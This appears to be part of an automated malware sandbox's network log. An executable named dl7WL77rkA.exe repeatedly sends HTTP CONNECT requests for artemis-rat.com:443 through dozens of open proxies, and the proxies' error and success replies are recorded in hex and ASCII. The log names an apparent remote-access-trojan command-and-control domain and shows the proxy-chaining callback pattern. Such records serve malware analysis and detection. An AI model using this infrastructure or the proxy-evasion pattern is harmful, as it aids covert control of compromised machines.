                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.635632038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.355353117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.694957972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.202255964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1084192.168.2.552809182.78.42.112823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.093067884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.905057907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092787981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405407906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.889580011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1085192.168.2.55289445.196.148.854323876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.107762098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.326488972 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 65
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="Proxy"
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                                                                                                                                                                                            Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1086192.168.2.55096351.158.108.165163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.109024048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.238643885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.311383963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.311541080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1087192.168.2.55283045.11.95.16550383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.115401030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1088192.168.2.55287047.93.121.200803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.116410971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.434758902 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.435575962 CET172INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.4.4</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1089192.168.2.55283547.74.226.850013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.120196104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1090192.168.2.55282927.65.240.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.122005939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1091192.168.2.55285945.233.2.141533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.124289036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1092192.168.2.55283443.255.113.23280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.124826908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1093192.168.2.55290174.119.144.6041453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.128709078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1094192.168.2.552910162.223.94.166803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.134587049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.523245096 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1095192.168.2.55285445.11.95.16560383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.134588957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.582854986 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1096192.168.2.552853112.78.181.21080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.138060093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.905004978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092669010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.202636957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.405278921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1097192.168.2.552936146.19.106.193123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.140250921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1098192.168.2.55293945.196.150.15554323876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.156244993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.379040956 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 65
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="Proxy"
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                                                                                                                                                                                            Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1099192.168.2.55296947.89.184.1831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.194062948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.411362886 CET38INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            content-length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1100192.168.2.552334220.194.189.14431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.196629047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:12.693600893 CET719INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: ZZY_WEB/20.08.18
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:53:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 563
                                                                                                                                                                                                                                                            Connection: close
